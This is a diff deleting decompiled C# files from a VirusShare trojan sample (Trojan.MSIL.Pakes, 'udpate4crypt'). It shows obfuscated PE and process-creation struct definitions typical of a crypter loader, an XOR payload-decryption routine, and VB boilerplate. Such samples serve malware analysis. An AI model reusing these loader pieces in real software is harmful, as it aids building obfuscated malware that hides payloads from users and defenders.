QJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU41 Misc;
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
public uint Pointer;
|
|
||||||
public uint PRelocations;
|
|
||||||
public uint PLines;
|
|
||||||
public uint NRelocations;
|
|
||||||
public uint NLines;
|
|
||||||
public uint Flags;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmm
|
|
||||||
{
|
|
||||||
public IntPtr Process;
|
|
||||||
public IntPtr Thread;
|
|
||||||
public int ProcessId;
|
|
||||||
public int ThreadId;
|
|
||||||
}
|
|
||||||
|
|
||||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmm
|
|
||||||
{
|
|
||||||
public int CB;
|
|
||||||
public string ReservedA;
|
|
||||||
public string Desktop;
|
|
||||||
public string Title;
|
|
||||||
public int X;
|
|
||||||
public int Y;
|
|
||||||
public int XSize;
|
|
||||||
public int YSize;
|
|
||||||
public int XCount;
|
|
||||||
public int YCount;
|
|
||||||
public int Fill;
|
|
||||||
public int Flags;
|
|
||||||
public short ShowWindow;
|
|
||||||
public short ReservedB;
|
|
||||||
public int ReservedC;
|
|
||||||
public int Input;
|
|
||||||
public int Output;
|
|
||||||
public int Error;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm
|
|
||||||
{
|
|
||||||
public int Length;
|
|
||||||
public IntPtr Descriptor;
|
|
||||||
public int Inherit;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm
|
|
||||||
{
|
|
||||||
public ushort Magic;
|
|
||||||
public ushort Last;
|
|
||||||
public ushort Pages;
|
|
||||||
public ushort Relocations;
|
|
||||||
public ushort Size;
|
|
||||||
public ushort Minimum;
|
|
||||||
public ushort Maximum;
|
|
||||||
public ushort SS;
|
|
||||||
public ushort SP;
|
|
||||||
public ushort Checksum;
|
|
||||||
public ushort IP;
|
|
||||||
public ushort CS;
|
|
||||||
public ushort Table;
|
|
||||||
public ushort Overlay;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|
||||||
public ushort[] ReservedA;
|
|
||||||
public ushort ID;
|
|
||||||
public ushort Info;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|
||||||
public ushort[] ReservedB;
|
|
||||||
public int Address;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad
|
|
||||||
{
|
|
||||||
public uint Signature;
|
|
||||||
public rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzadd File;
|
|
||||||
public rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzaddd Optional;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzadd
|
|
||||||
{
|
|
||||||
public ushort Machine;
|
|
||||||
public ushort Sections;
|
|
||||||
public uint Stamp;
|
|
||||||
public uint Table;
|
|
||||||
public uint Symbols;
|
|
||||||
public ushort Size;
|
|
||||||
public ushort Flags;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzaddd
|
|
||||||
{
|
|
||||||
public ushort Magic;
|
|
||||||
public byte Major;
|
|
||||||
public byte Minor;
|
|
||||||
public uint SCode;
|
|
||||||
public uint IData;
|
|
||||||
public uint UData;
|
|
||||||
public uint Address;
|
|
||||||
public uint Code;
|
|
||||||
public uint Data;
|
|
||||||
public uint Image;
|
|
||||||
public uint SectionA;
|
|
||||||
public uint FileA;
|
|
||||||
public ushort MajorO;
|
|
||||||
public ushort MinorO;
|
|
||||||
public ushort MajorI;
|
|
||||||
public ushort MinorI;
|
|
||||||
public ushort MajorS;
|
|
||||||
public ushort MinorS;
|
|
||||||
public uint Version;
|
|
||||||
public uint SImage;
|
|
||||||
public uint SHeaders;
|
|
||||||
public uint Checksum;
|
|
||||||
public ushort Subsystem;
|
|
||||||
public ushort Flags;
|
|
||||||
public uint SSReserve;
|
|
||||||
public uint SSCommit;
|
|
||||||
public uint SHReserve;
|
|
||||||
public uint SHCommit;
|
|
||||||
public uint LFlags;
|
|
||||||
public uint Count;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|
||||||
public rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzadddd[] DataDirectory;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzadddd
|
|
||||||
{
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
Binary file not shown.
@ -1,10 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyProduct("")]
|
|
||||||
[assembly: AssemblyDescription("")]
|
|
||||||
[assembly: AssemblyCopyright("")]
|
|
||||||
[assembly: AssemblyTitle("")]
|
|
||||||
[assembly: AssemblyTrademark("")]
|
|
||||||
[assembly: AssemblyCompany("")]
|
|
||||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
|
||||||
[assembly: AssemblyVersion("1.0.0.0")]
|
|
@ -1,34 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: FxSÙÉÚßsÞÝWÆCipgùÔOßråÞÒg
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.Text;
|
|
||||||
|
|
||||||
public class FxSÙÉÚßsÞÝWÆCipgùÔOßråÞÒg
|
|
||||||
{
|
|
||||||
public static byte[] LlþmQÎ5äìðöNè6ôÌBJäéõ5yCÓ(
|
|
||||||
byte[] ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6,
|
|
||||||
string bÚüÆsÀõÂruGGØß0PõÏjrõüæËÁ)
|
|
||||||
{
|
|
||||||
byte[] bytes = Encoding.Default.GetBytes(bÚüÆsÀõÂruGGØß0PõÏjrõüæËÁ);
|
|
||||||
int num1 = (int) ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6[checked (ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6.Length - 1)] ^ 112;
|
|
||||||
byte[] arySrc = new byte[checked (ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6.Length + 1)];
|
|
||||||
int num2 = checked (ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6.Length - 1);
|
|
||||||
int index1 = 0;
|
|
||||||
while (index1 <= num2)
|
|
||||||
{
|
|
||||||
int index2;
|
|
||||||
arySrc[index1] = checked ((byte) ((int) ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6[index1] ^ num1 ^ (int) bytes[index2]));
|
|
||||||
if (index2 == checked (bÚüÆsÀõÂruGGØß0PõÏjrõüæËÁ.Length - 1))
|
|
||||||
index2 = 0;
|
|
||||||
else
|
|
||||||
checked { ++index2; }
|
|
||||||
checked { ++index1; }
|
|
||||||
}
|
|
||||||
return (byte[]) Utils.CopyArray((Array) arySrc, (Array) new byte[checked (ØöÆoêÓÙIõûÞBábzjþLeÈfãÊo6.Length - 2 + 1)]);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyComputer
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,108 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyProject
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[HideModuleName]
|
|
||||||
[StandardModule]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal new Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[ComVisible(false)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
